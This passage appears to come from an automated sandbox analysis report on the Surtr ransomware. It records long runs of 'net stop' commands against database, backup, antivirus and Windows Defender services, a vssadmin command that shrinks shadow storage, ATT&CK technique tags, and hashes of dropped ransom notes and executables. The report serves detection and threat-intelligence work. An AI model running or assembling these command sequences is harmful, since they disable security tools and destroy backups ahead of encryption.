C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "SQLBrowser"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"3⤵
-
C:\Windows\system32\net.exenet stop "SQLWriter"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"5⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SstpSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"3⤵
-
C:\Windows\system32\net.exenet stop "svcGenericHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"3⤵
-
C:\Windows\system32\net.exenet stop "tmlisten"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"3⤵
-
C:\Windows\system32\net.exenet stop "TrueKey"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"3⤵
-
C:\Windows\system32\net.exenet stop "UI0Detect"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCatalogSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"3⤵
- Adds Run key to start application
-
C:\Windows\system32\net.exenet stop "W3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"3⤵
-
C:\Windows\system32\net.exenet stop "WRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"3⤵
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"3⤵
-
C:\Windows\system32\net.exenet stop "swi_update"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"3⤵
-
C:\Windows\system32\net.exenet stop "SQL Backups"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"3⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"3⤵
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"3⤵
-
C:\Windows\system32\net.exenet stop "EhttpSrv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"3⤵
-
C:\Windows\system32\net.exenet stop "ekrn"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"3⤵
-
C:\Windows\system32\net.exenet stop "ESHASRV"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "AVP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"3⤵
-
C:\Windows\system32\net.exenet stop "klnagent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"3⤵
-
C:\Windows\system32\net.exenet stop "wbengine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"3⤵
-
C:\Windows\system32\net.exenet stop "HvHost"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"3⤵
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"3⤵
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"3⤵
-
C:\Windows\system32\net.exenet stop "vmicshutdown"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"3⤵
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"3⤵
-
C:\Windows\system32\net.exenet stop "vmcompute"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvmsession"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"3⤵
-
C:\Windows\system32\net.exenet stop "vmicrdv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"3⤵
-
C:\Windows\system32\net.exenet stop "vmictimesync"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"3⤵
-
C:\Windows\system32\net.exenet stop "vmicvss"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"3⤵
-
C:\Windows\system32\net.exenet stop "VMAuthdService"4⤵
- Drops startup file
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"3⤵
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"3⤵
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"3⤵
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"3⤵
-
C:\Windows\system32\net.exenet stop "VMwareHostd"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"3⤵
- Adds Run key to start application
-
C:\Windows\system32\net.exenet stop "Sense"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"3⤵
-
C:\Windows\system32\net.exenet stop "WdNisSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
- Hidden Files and Directories (1)
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- Modify Registry (2)
- Indicator Removal on Host (1)
- File Deletion (2)
- Hidden Files and Directories (1)
Downloads
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
  Filesize: 8KB
  MD5: 53dab3a3443e1439e53220aff1e7490f
  SHA1: 4222d1841951b87cd54516d3381f8358791fd988
  SHA256: ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
  SHA512: 5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt
  Filesize: 621B
  MD5: edb2c94c58363c1d8e428506e28d669f
  SHA1: 50041c9b823d76a932788d553b07cc25297a0ff7
  SHA256: 428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
  SHA512: 024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
  Filesize: 320KB
  MD5: e6fc190168519d6a6c4f1519e9450f0f
  SHA1: af2080ddf1064fb80c7b9af942aaabf264441098
  SHA256: 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
  SHA512: 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
- C:\ProgramData\Service\ID_DATA.surt
  Filesize: 14B
  MD5: db84d0324aeb1f2a9c496b293adef33d
  SHA1: 79bc8117faef8c4f2273358b43c1280f0e70deea
  SHA256: 9c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
  SHA512: e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
- C:\ProgramData\Service\Private_DATA.surt
  Filesize: 1KB
  MD5: 99a04b59f115e55249d7323a446446df
  SHA1: 942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
  SHA256: af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
  SHA512: 25a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
- C:\ProgramData\Service\Public_DATA.surt
  Filesize: 204B
  MD5: 07c7fc3eb4a68e9e968c0a7e22fb1092
  SHA1: 9d3804e00636a82d6d74812d6c6a4dcecaf5ef5d
  SHA256: 0f880c9481db083d9872faec40139e2a2b99eeae1fa98717634a51b84aeeb99b
  SHA512: 60d1a7f2620b526bec9378962566966deb53238a22610d5a728a0118d8f6ca2153c69dca6dedd87248f967736b1c31329adc07c930e5ccac467436d264eb580f
- C:\ProgramData\Service\SURTR_README.hta
  Filesize: 8KB
  MD5: 53dab3a3443e1439e53220aff1e7490f
  SHA1: 4222d1841951b87cd54516d3381f8358791fd988
  SHA256: ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
  SHA512: 5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
- C:\ProgramData\Service\SURTR_README.txt
  Filesize: 621B
  MD5: edb2c94c58363c1d8e428506e28d669f
  SHA1: 50041c9b823d76a932788d553b07cc25297a0ff7
  SHA256: 428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
  SHA512: 024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
-
C:\ProgramData\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\SurtrBackGround.jpgFilesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.icoFilesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surtFilesize
14B
MD5db84d0324aeb1f2a9c496b293adef33d
SHA179bc8117faef8c4f2273358b43c1280f0e70deea
SHA2569c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
-
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surtFilesize
1KB
MD599a04b59f115e55249d7323a446446df
SHA1942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA51225a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
-
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.htaFilesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
memory/268-198-0x0000026F41838000-0x0000026F41840000-memory.dmpFilesize
32KB
-
memory/344-157-0x0000000000000000-mapping.dmp
-
memory/576-151-0x0000000000000000-mapping.dmp
-
memory/592-141-0x0000000000000000-mapping.dmp
-
memory/608-153-0x0000000000000000-mapping.dmp
-
memory/664-140-0x0000000000000000-mapping.dmp
-
memory/772-123-0x0000000000000000-mapping.dmp
-
memory/1068-154-0x0000000000000000-mapping.dmp
-
memory/1136-149-0x0000000000000000-mapping.dmp
-
memory/1176-142-0x0000000000000000-mapping.dmp
-
memory/1184-122-0x0000000000000000-mapping.dmp
-
memory/1220-177-0x0000000000000000-mapping.dmp
-
memory/1252-147-0x0000000000000000-mapping.dmp
-
memory/1264-143-0x0000000000000000-mapping.dmp
-
memory/1320-138-0x0000000000000000-mapping.dmp
-
memory/1336-137-0x0000000000000000-mapping.dmp
-
memory/1372-155-0x0000000000000000-mapping.dmp
-
memory/1380-159-0x0000000000000000-mapping.dmp
-
memory/1472-134-0x0000000000000000-mapping.dmp
-
memory/1520-124-0x0000000000000000-mapping.dmp
-
memory/1612-160-0x0000000000000000-mapping.dmp
-
memory/1616-139-0x0000000000000000-mapping.dmp
-
memory/1732-125-0x0000000000000000-mapping.dmp
-
memory/1780-162-0x0000000000000000-mapping.dmp
-
memory/1932-171-0x0000000000000000-mapping.dmp
-
memory/1964-161-0x0000000000000000-mapping.dmp
-
memory/2060-164-0x0000000000000000-mapping.dmp
-
memory/2080-166-0x0000000000000000-mapping.dmp
-
memory/2156-176-0x0000000000000000-mapping.dmp
-
memory/2180-168-0x0000000000000000-mapping.dmp
-
memory/2228-169-0x0000000000000000-mapping.dmp
-
memory/2260-121-0x0000000000000000-mapping.dmp
-
memory/2332-119-0x0000000000000000-mapping.dmp
-
memory/2332-180-0x0000000000000000-mapping.dmp
-
memory/2392-145-0x0000000000000000-mapping.dmp
-
memory/2456-170-0x0000000000000000-mapping.dmp
-
memory/2488-158-0x0000000000000000-mapping.dmp
-
memory/2552-146-0x0000000000000000-mapping.dmp
-
memory/2568-144-0x0000000000000000-mapping.dmp
-
